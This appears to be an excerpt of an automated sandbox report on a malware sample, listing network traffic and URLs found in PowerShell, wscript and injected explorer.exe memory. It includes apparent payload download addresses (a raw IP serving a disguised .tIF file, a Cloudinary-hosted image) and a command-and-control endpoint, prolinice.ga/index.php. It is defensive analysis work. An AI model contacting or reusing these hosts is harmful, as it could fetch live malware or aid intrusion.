c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 10:09:54 GMTServer: Apache/2.4.59 (Debian)Content-Length: 409Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

Source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.27.144/250/sweetnes
Source: powershell.exe, 00000004.00000002.1762483774.0000000004F17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIF
Source: powershell.exe, 00000004.00000002.1766198522.00000000072DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFI
Source: powershell.exe, 00000004.00000002.1761871752.0000000002C5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFLMEM
Source: powershell.exe, 00000004.00000002.1767676409.00000000081EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.27.144/250/sweetnessgoodforgreatnessthingswithgood.tIFuuC:
Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: powershell.exe, 00000004.00000002.1767676409.0000000008171000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000000E.00000000.1999335079.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/
Source: explorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/2:i
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.2249471749.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.2230991897.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2220685342.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2230962875.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2893723974.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2428964622.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2894572076.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2893893666.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2894417010.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2894362131.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.php
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.phpH
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2220685342.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2230962875.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2893723974.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2428964622.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2894572076.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2893893666.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2894417010.0000000002AA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2894362131.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/j
Source: explorer.exe, 00000011.00000002.2249471749.0000000002CAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/ll
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/ndex.php
Source: explorer.exe, 00000011.00000002.2249471749.0000000002C47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga:80/index.phposoft
Source: explorer.exe, 0000000E.00000002.2903801891.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2903005039.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2000821408.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000E.00000000.2004435868.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000000E.00000000.1994245178.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: powershell.exe, 00000004.00000002.1762483774.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.00000000047C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 0000000E.00000002.2898011121.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1991503224.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989328162.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000000.1999335079.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1999335079.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.1999335079.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2904691070.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1940207997.0000000006372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dahall/taskscheduler
Source: sweetnessgoodforgreatnessthingswith.vbS.4.dr	String found in binary or memory: https://github.com/koswald/VBScript
Source: wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
Source: wscript.exe, 00000007.00000003.1728279245.0000000003597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs0
Source: wscript.exe, 00000007.00000003.1727917587.0000000005461000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731232667.0000000003020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1734359512.000000000566B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731003803.000000000592F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1731407928.0000000005561000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood[1].tiff.4.dr, sweetnessgoodforgreatnessthingswith.vbS.4.dr	String found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
Source: powershell.exe, 00000004.00000002.1762483774.00000000051B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: powershell.exe, 00000004.00000002.1767676409.00000000081D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/tX3.PowerShell.dllReporting/icrosoft.WindowsErrorRep
Source: powershell.exe, 00000004.00000002.1764099136.0000000005A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1940207997.000000000582E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com
Source: powershell.exe, 00000008.00000002.1939177634.0000000002AB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v173542088
Source: powershell.exe, 00000008.00000002.1939934208.0000000004290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg
Source: powershell.exe, 00000008.00000002.1940207997.0000000004917000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpgt
Source: powershell.exe, 00000008.00000002.1971873914.0000000006E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882W
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000E.00000000.2004435868.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2909647286.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 0000000E.00000002.2909647286.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2004435868.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 00000011.00000003.2226719134.0000000002CC6000.00000004.00000020.00020000.00000000.sdmp, F714.tmp.17.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1994245178.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
